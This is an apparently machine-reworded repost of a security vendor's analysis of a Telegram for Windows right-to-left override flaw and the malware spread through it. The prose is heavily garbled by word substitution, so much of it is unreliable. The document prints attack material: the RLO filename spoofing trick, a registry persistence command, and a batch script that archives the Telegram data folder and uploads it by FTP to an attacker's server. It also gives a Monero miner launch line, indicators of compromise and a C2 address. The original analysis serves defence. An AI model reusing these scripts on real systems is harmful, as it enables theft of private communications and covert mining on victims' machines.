Zero-day vulnerability in Telegram

No Comments

Zero-day vulnerability in Telegram

zeroday-vulnerability-in-telegram-hacker-tech-news-portray-show-news-business-blog--many-good-internet-things

In Oct 2017, we realized of a danger in Telegram Messenger’s Home windows machine that denaturized into erst existence misused within the wild. It entails utilizing a tralatitious superior-to-left override move when a mortal sends accumulation over the traveller carrier.

True-to-left override in a nutshell

The portion nonprinting superior-to-left override (RLO) personality is fraudulence to alter the provide an account for of the characters that nearby after that personality within the string. In the Unicode personality desk, it is represented as ‘U+202E’; digit ready of consonant ingest is when typewriting Semite text. In an attack, this personality strength most sure substantially modify be fraudulence to verify the sufferer. It’s on the flooded fraudulence when displaying the denomination and spreading of an workable file: a lowercase taste of helper disposed to this category of move module move the name incompletely or in reverse.

Launching an move on Telegram

Below is an fable of how this danger denaturized into erst misused in Telegram:

    • The cybercriminal prepares the malware to be dispatched in a message. As an instance, a JS enter is renamed as follows:

defective.js -> photo_high_re*U+202E*gnp.js
The ready *U+202E* is the RLO personality to amend Telegram move the effort progress gnp.js in reverse. Prove that this activeness would today not move the precise enter – it tranquil has the spreading *.js.

  • The assailant sends the message, and – shock! – the acquirer sees an inbound PNG represent enter as a deciding of a JS file:

 

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

 

  • When the mortal clicks on this file, the fashioned Home windows section asking is displayed:

 

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

Importantly, this asking is handiest displayed if it hasn’t been unfit within the system’s settings. If the mortal clicks on ‘Dawdle’, the vindictive enter is launched.

Exploitation within the wild

After uncovering discover the vulnerability, we started to see cases where it denaturized into erst in saucer of actuality exploited. These cases modify into a sort of fashioned scenarios.

Far soured regulate

The plan of this category of move is to poverty ordered of the sufferer’s system, and entails the assailant uncovering discover the intend system’s condition and the ordered up of added modules.

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-thingsAssault flowchart

On the field stage, a downloader is disbursed to the aim, which is cursive in .Rep, and uses Telegram API as the provide an account for protocol:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

With this minimal and API, it is cushy to see discover the Telegram bot by aptitude of which the septic programs are managed:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

When launched, it modifies start registry key to concoct enduringness on a grouping and copies its workable enter into digit in every the directories, relying on the ambiance:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

Then it begins to effort every digit seconds for manual effort again from the ordered bot. Prove that the manual are implemented in Russian:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

The itemize of based manual reveals that the bot crapper silently deploy capricious vindictive tools verify tending of backdoors, loggers and another malware on the intend system. A rank itemize of based manual is presented under:

Explain
(English translation)
Characteristic
“Онлайн
(On-line)
Ship itemize of accumulation in directory to cook bot.
“Запус
(Launch)
Launch workable enter utilizing Route of.Open().
“Логгер
(Logger)
Take a countenance at if tor job is running, obtain logg.zip, verify it, withdraw the deposit and play up its content.
“Скачать
(Net)
Net enter into its comprise directory.
“Удалить
(Delete)
Delete enter from its comprise directory.
“Распаковать
(Unpack)
Unpack deposit in its comprise directory utilizing given password.
Убить
(Cancel)
Terminate given employ utilizing job.Cancel()
Скачат
(Net)
Connected as ‘Net’ (peep above), with mixed provide an account for parsing.
Запуск
(Launch)
Connected as ‘Launch’ (peep above), with mixed provide an account for parsing.
Удалить
(Delete)
Connected as ‘Delete’ (peep above), with mixed provide an account for parsing.
Распаковать
(Unpack)
Connected as ‘Unpack’ (peep above), with mixed provide an account for parsing.
Процессы
(Processes)
Ship a checklist of manual streaming on instruction PC to cook bot.

An psychotherapy of these manual reveals that this dockhand module most probable be fashioned to obtain but some another example of malware, most sure a logger that module most sure substantially look on the unfortunate person.

Miners and extra

Amid the cryptocurrency allege, cybercriminals are progressively agitated absent from ‘traditional robbery’ to a sort extraordinary machine of making change from their victims – specially defence cryptocurrency utilizing the sources of an septic computer. All they staleness concoct is walk a defence machine on the unfortunate machine and verify the aggregation of their cryptocurrency pockets.

Space #1

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-thingsAssault flowchart

On the field initiate of the attack, an SFX deposit with a playscript is fraudulence that launches an workable file:

Route=%temp%adr
Setup=%temp%adrmosey.exe
Silent=1
Overwrite=2

This mosey.exe file is really a BAT file. The collection script, after extraction, looks verify tending of this:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

As we are in a function to peep, the vindictive aggregation prototypal opens a cheater enter – on this housing it is an represent to silence the unfortunate faithful into a simulated significance of security.

Then, digit miners play up digit after the opposite. They’re launched as providers with the abet of the nssm.exe utility, which module most probable be contained within the aforementioned SFX archive.

  • nheq.exe: an Equihash jack for NiceHash (on this inform case, it mined Zcash). Can ingest the sources of both the mainframe and graphics accelerator:
    zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things
  • taskmgn.exe – but some another smartly-liked jack enforcing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a identified inform progress with pdb path:
    zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

We comprise seen a sort of variations of this collection script, a unify of of which comprise added components:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

This inform edition disables Home windows section components, then logs on to a vindictive protocol server, downloads a explosive and launches it. In this case, the explosive denaturized into erst an SFX deposit that incorporates but some another miners and a Far soured Manipulator Procedure (RMS) client, an similarity of TeamViewer. The practice of AutoIt scripts, the malware deploys RMS on the convergent machine for ensuant extreme access:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

The move flowchart is roughly as follows:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

We comprise examined this protocol machine and institute a sort of player kindred payloads, which are most sure unexploded by another variations of this malware.

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

The enter address4.exe is sufficiency of a mixed mention. Love the oppositeness data, it is an SFX deposit with the incoming contents:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

All components titled st*.exe are workable PE accumulation transformed in a kindred intention from collection scripts.

The SFX playscript launches the surroundings st1.exe:

Route=%temp%/adress
Setup=%temp%/adress/st1.exe
Silent=1
Overwrite=2

st1.exe provides st2.exe to the grouping start by composition the precise enter to the grouping registry:

reg add HKEY_CURRENT_USERSOFTWAREMicrosoftHome windowsCurrentVersionRunOnce /v RUN1 /d %temp%adressst2.exe /f

So the st2.exe enter launches when grouping is booted ensuant time:

TIMEOUT /T 10 /NOBREAK #Waits for Telegram to play up
chcp 1251
tskill telegram
taskkill /IM telegram.exe #Terminates Telegram processes
md %temp%sss
cd %temp%sss #Creates a temporary directory
“%temp%adressWinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%sss1.rar” “%appdata%Telegram Desktop” #Packs the Telegram directory faithful into a RAR archive
TIMEOUT /T 60 /NOBREAK
:originate
ping -n 1 ya.ru |>nul bonded /i “TTL=” && (originate “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :originate) #Checks Net unification and launches st3.exe

As anticipated, st3.exe logs on to the vindictive protocol machine and uploads the RAR deposit that denaturized into erst created earlier:

@echo XXXXXXXX>give an account for.txt
@echo XXXXXXXX>>give an account for.txt
@echo binary>>give an account for.txt
@echo mput %temp%sss*.rar>>give an account for.txt
@echo stop>>give an account for.txt
ftp -s:give an account for.txt -i free11.receive.com
del provide an account for.txt
attrib %temp%/adress +H
attrib %temp%/adress* +H

On that protocol server, we institute a sort of deposit of this category containing Telegram directories taken from the victims:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

Every shitting incorporates, as substantially to the Telegram client’s executables and programme data, an encrypted topical store containing mixed accumulation fraudulence in inland most communications: documents, movies and frequence accumulation and photos.

Space #2

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

Appropriate verify tending of within the preceding scenario, an move begins with an SFX deposit inaugural and actuation a VBScript that it incorporates. Its vital employ is to play up a cheater represent to disconcert the person, after which obtain and play up the payload:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

The explosive is an SFX deposit with the incoming script:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

svchost.vbs is a playscript controlling the play up of the jack CryptoNight (csrs.exe). It shows the obligation list; if it detects a naming programme (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s employ and re-launches it when the obligation programme is closed.

The playscript incorporates the precise comments:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

The jack itself is launched as follows:

WshShell.Dawdle “csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1″ & cores, zero

The bet come is related with the cryptocurrency Monero.

On the machine itself, as substantially to to the given explosive data, we institute kindred SFX deposit with miners:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

Conclusion

It looks that handiest Slavonic cybercriminals comprise been semiconscious most this vulnerability, with every of the utilization cases that we perceived attractive locate in Russia. Also, whereas conducting a careful see of these assaults we institute a clump of artifacts that spinous to status by Slavonic cybercriminals.

We don’t comprise comely aggregation most how prolonged and which variations of the Telegram products comprise been untidy with the vulnerability. What we concoct undergo is that its utilization in Home windows customers started in March 2017. We told the Telegram builders of the world, and the danger no individual occurs in Telegram’s products.

This essay items handiest those cases that comprise been reportable by Kaspersky Lab’s telemetry programs. The fat orbit and another techniques of utilization springy unknown.

IoC

MD5

First stage

650DDDE919F9E5B854F8C375D3251C21
C384E62E483896799B38437E53CD9749
FA391BEAAF8B087A332833E618ABC358
52F7B21CCD7B1159908BCAA143E27945
B1760E8581F6745CBFCBE76FBD0ACBFA
A662D942F0E43474984766197288845B

Payloads

B9EEC74CA8B14F899837A6BEB7094F65
46B36F8FF2369E883300F472694BBD4D
10B1301EAB4B4A00E7654ECFA6454B20
CD5C5423EC3D19E864B2AE1C1A9DDBBC
7A3D9C0E2EA27F1B96AEFED2BF8971A4
E89FDDB32D7EC98B3B68AB7681FACCFC
27DDD96A87FBA2C15B5C971BA6EB80C6
844825B1336405DDE728B993C6B52A83
C6A795C27DEC3F5559FD65884457F6F3
89E42CB485D65F71F62BC1B64C6BEC95
0492C336E869A14071B1B0EF613D9899
2CC9ECD5566C921D3876330DFC66FC02
1CE28167436919BD0A8C1F47AB1182C4

C2 servers

http://nord.adr[.]com[.]ua/

Filenames

title?gpj.exe
title?gpj.rar
address?gpj.scr
address_?gpj.scr
photoadr?gepj.scr

Learn More

Zero-day vulnerability in Telegram

Zero-day vulnerability in Telegram

Zero-day vulnerability in Telegram

hackers, tech, technology, telegram, vulnerability
hackers, tech, technology, telegram, vulnerability

Leave a Reply

Your email address will not be published. Required fields are marked *